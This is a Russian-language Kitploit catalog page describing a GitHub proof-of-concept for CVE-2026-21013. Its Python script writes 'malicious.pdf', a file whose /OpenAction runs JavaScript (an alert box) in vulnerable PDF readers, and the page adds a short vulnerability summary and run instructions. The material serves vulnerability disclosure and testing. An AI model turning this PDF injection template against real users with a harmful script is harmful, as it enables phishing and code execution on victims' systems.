Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — Генерирует PDF-файл со встроенным JavaScript для демонстрации CVE-2026-21013 — инъекции OpenAction, приводящей к выполнению скриптов в уязвимых PDF-ридерах. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияВеб-безопасность
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

Генерирует PDF-файл со встроенным JavaScript для демонстрации CVE-2026-21013 — инъекции OpenAction, приводящей к выполнению скриптов в уязвимых PDF-ридерах.

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-21013 – Внедрение JavaScript в PDF через встроенный скрипт

Код программы (Python, создающий вредоносный PDF)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – Внедрение JavaScript в PDF через OpenAction

Severity: Medium

Обзор

Генератор PDF не очищает пользовательский контент перед встраиванием его в PDF-файл. Злоумышленник может внедрить запись JavaScript , которая выполняется при открытии документа, что приводит к межсайтовому скриптингу (в веб-просмотрщиках) или локальному выполнению кода (в настольных программах просмотра с полной поддержкой JS).

/OpenAction

Детали уязвимости

  • Тип: Внедрение в PDF / Выполнение кода на стороне клиента
  • Воздействие: Фишинг, кража учётных данных, доставка вредоносного ПО.
  • Корневая причина: PDF-библиотека напрямую встраивает управляемые атакующим строки в структуру PDF без экранирования или проверки.

Демонстрация эксплойта

Запустите генератор:

root@kitploit:~
python generate_pdf_js_inject.py

Откройте полученный malicious.pdf в программе просмотра PDF с поддержкой JavaScript — появится окно предупреждения.

Скачать инструмент